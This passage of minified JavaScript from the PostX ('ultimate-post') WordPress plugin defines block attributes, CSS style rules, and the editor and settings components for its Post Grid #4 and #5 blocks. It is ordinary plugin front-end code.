p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},headingText:{type:"string",default:"Post Grid #4"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }{{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"navigation"},pagiMargin:{type:"object",default:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul { margin:{{pagiMargin}}; }"}]},pagiAlign:{type:"object",default:{lg:"left"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-loadmore, {{ULTP}} .ultp-next-prev-wrap ul, {{ULTP}} .ultp-pagination, {{ULTP}} .ultp-pagination-wrap { text-align:{{pagiAlign}}; }"}]},...(0,o.t)(["advFilter","heading","advanceAttr","pagiBlockCompatibility","pagination","video","meta","category","readMore","query"],["paginationAjax","pagiMargin","loadMoreText","pagiAlign","queryNumPosts","queryNumber"],[{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"readMoreColor",default:"#FFFFFF"}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},47127:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(12975),r=l(92829),s=l(57433);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-4/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-4.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid4.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-4")]},edit:n.Z,save:()=>null})},69234:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(11057);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useRef:_,useState:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=_(null),{setAttributes:l,name:B,clientId:U,className:M,attributes:A,isSelected:H,context:N,attributes:{blockId:j,excerptLimit:Z,showSmallMeta:O,metaStyle:R,metaShow:D,catShow:z,showImage:F,metaSeparator:W,titleShow:V,catStyle:G,catPosition:q,titlePosition:$,excerptShow:K,imgAnimation:J,imgOverlayType:Y,imgOverlay:X,metaList:Q,metaListSmall:ee,showSmallCat:te,readMore:le,readMoreText:oe,readMoreIcon:ae,overlayContentPosition:ie,showSmallBtn:ne,showSmallExcerpt:re,metaPosition:se,showFullExcerpt:pe,layout:ce,columnFlip:ue,titleAnimation:de,customCatColor:me,onlyCatColor:ge,contentTag:ye,titleTag:be,showSeoMeta:ve,titleLength:he,metaMinText:fe,metaAuthorPrefix:ke,titleStyle:we,metaDateFormat:xe,authorLink:Te,imgCrop:_e,imgCropSmall:Ce,fallbackEnable:Ee,vidIconEnable:Se,notFoundMessage:Pe,dcEnabled:Le,dcFields:Ie,previewImg:Be,advanceId:Ue,paginationShow:Me,headingShow:Ae,filterShow:He,paginationType:Ne,navPosition:je,querySticky:Ze,V4_1_0_CompCheck:{runComp:Oe},currentPostId:Re}}=e,[De,ze]=C(f.Ti),[Fe,We]=C(null);function Ve(e){ze({...De,selectedDC:e})}function Ge(){ze({...De,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function qe(e){ze({...De,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),We("setting")}function $e(e){ze((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function Ke(){De.error&&ze({...De,error:!1}),De.loading||ze({...De,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(A)}).then((e=>{ze({...De,postsList:e,loading:!1})})).catch((e=>{ze({...De,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),Ke()}),[]),T((()=>{const t=U.substr(0,6),o=L(I(U));(0,a.qi)(l,o,Re,U),(0,y.h)(e),j?j&&j!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[U]),T((()=>{const e=t.current;(0,b.o6)()&&0===A.dcFields.length&&l({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,A)&&(Ke(),t.current=A),e.isSelected!==H&&H&&(0,f.gT)(qe,$e)):t.current=A}),[A]),T((()=>{Ze&&l({queryNumber:"4"})}),[Ze]);const Je={settingTab:Fe,setSettingTab:We,setAttributes:l,name:B,attributes:A,setSection:qe,section:De.section,clientId:U,context:N,setSelectedDc:Ve,selectedDC:De.selectedDC,selectParentMetaGroup:function(e){Ve(e),$e("dc_group")}};let Ye;if(j&&(Ye=(0,m.Kh)(A,"ultimate-post/post-grid-5",j,(0,a.k0)())),Be&&!H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Be});T((()=>{!H&&Be&&l({previewImg:""})}),[e?.isSelected]);const Xe=x({...Ue&&{id:Ue},className:`ultp-block-${j} ${M}`,onClick:e=>{e.stopPropagation(),qe("general"),$e("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:Je,selected:De.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:Je})),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-5",key:"layout",options:[{img:"assets/img/layouts/pg5/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg5/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Oe?"exclude":"dep"]:a.N2,pro:["metaShow","catShow"]}],store:Je}),(0,o.createElement)("div",Xe,Ye&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Ye}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ae||He||Me)&&(0,o.createElement)(r.m,{attributes:A,setAttributes:l,onClick:()=>{qe("heading"),$e("heading")},setSection:qe,setToolbarSettings:$e}),function(){const e=`${ye}`,t=(e,t)=>(0,b.o6)()&&Le&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Ie,settingsOnClick:(e,t)=>{e?.stopPropagation(),$e(t)},selectedDC:De.selectedDC,setSelectedDc:Ve,setAttributes:l,dcFields:Ie});return De.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):De.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):De.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${ce} ultp-block-content-${ue}`},De.postsList.map(((a,r)=>{const c=0==r||3==r?JSON.parse(Q.replaceAll("u0022",'"')):JSON.parse(ee.replaceAll("u0022",'"')),m=0==r?_e:Ce;return(0,o.createElement)(e,{key:r,className:`ultp-block-item post-id-${a.ID} ${de?"ultp-animation-"+de:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.w4,{imgOverlay:X,imgOverlayType:Y,imgAnimation:J,post:a,fallbackEnable:Ee,vidIconEnable:Se,catPosition:q,showImage:F,idx:r,showSmallCat:te,Category:0==r||te||3==r?"aboveTitle"!=q&&(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:a,catShow:z,catStyle:G,catPosition:q,customCatColor:me,onlyCatColor:ge,onClick:e=>{qe("taxonomy-/-category"),$e("cat")}})):null,onClick:()=>{qe("image"),$e("image")},imgSize:m}),Se&&a.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{qe("video"),$e("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${ie}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,a.ID),"aboveTitle"==q&&(0==r||te||"layout3"==ce&&3==r)&&(0,o.createElement)(i.Z,{post:a,catShow:z,catStyle:G,catPosition:q,customCatColor:me,onlyCatColor:ge,onClick:e=>{qe("taxonomy-/-category"),$e("cat")}}),t(6,a.ID),a.title&&V&&1==$&&(0,o.createElement)(d.Z,{title:a.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{qe("title"),$e("title")}}),t(5,a.ID),(0==r||O||"layout3"==ce&&3==r)&&D&&"top"==se&&(0,o.createElement)(p.Z,{meta:c,post:a,metaSeparator:W,metaStyle:R,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{qe("meta"),$e("meta")}}),t(4,a.ID),a.title&&V&&0==$&&(0,o.createElement)(d.Z,{title:a.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{qe("title"),$e("title")}}),t(3,a.ID),(0==r||re||"layout3"==ce&&3==r)&&K&&(0,o.createElement)(n.Z,{excerpt:a.excerpt,excerpt_full:a.excerpt_full,seo_meta:a.seo_meta,excerptLimit:Z,showFullExcerpt:pe,showSeoMeta:ve,onClick:e=>{qe("excerpt"),$e("excerpt")}}),t(2,a.ID),(0==r||ne||"layout3"==ce&&3==r)&&le&&(0,o.createElement)(u.Z,{readMoreText:oe,readMoreIcon:ae,titleLabel:a.title,onClick:()=>{qe("read-more"),$e("read-more")}}),t(1,a.ID),(0==r||O||"layout3"==ce&&3==r)&&D&&"bottom"==se&&(0,o.createElement)(p.Z,{meta:c,post:a,metaSeparator:W,metaStyle:R,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{qe("meta"),$e("meta")}}),t(0,a.ID),(0,b.o6)()&&Le&&(0,o.createElement)(v.Z,{dcFields:Ie,setAttributes:l,startOnboarding:Ge,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Pe})}(),Me&&"navigation"==Ne&&"topRight"!=je&&(0,o.createElement)(c.Z,{onClick:()=>{qe("pagination"),$e("pagination")}}))))}},11057:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8;function b({store:e}){const{queryType:t,titleAnimationArg:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:u}}=e.attributes,{context:d,section:y,settingTab:b,setSettingTab:v}=e;return g((()=>{(0,m.CH)(d,n,e,r)}),[n,r,e.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6833",store:e}),(0,o.createElement)(p.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:e,exclude:["queryNumber","queryNumPosts"]}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:e,initialOpen:!0,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-5",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg5/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg5/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg5/l3.svg",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnFlip",pro:!0,label:__("Flip Layout","ultimate-post")}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:5,label:__("Number of Post","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:y.image,depend:"showImage",include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,initialOpen:y.meta,depend:"metaShow",exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:e,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:e}),(0,o.createElement)(a.fm,{store:e,include:l}),!u&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:y.heading,depend:"headingShow"}),"posts"!=t&&"customPosts"!=t&&(0,o.createElement)(a.B0,{pro:!0,isTab:!0,store:e,initialOpen:y.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:1,data:a.YA},{position:2,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{pro:!0,isTab:!0,store:e,initialOpen:y.pagination,depend:"paginationShow",include:[{position:1,data:{tab:"settings",type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","pagiMargin","navPosition"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["filterTypo","fliterSpacing","fliterPadding"],exSettings:["filterValue","filterType"],incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"],incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"]}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleBackground","titleHoverColor","titleAnimColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing","metaSeparator","metaStyle","metaList"],incSettings:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More 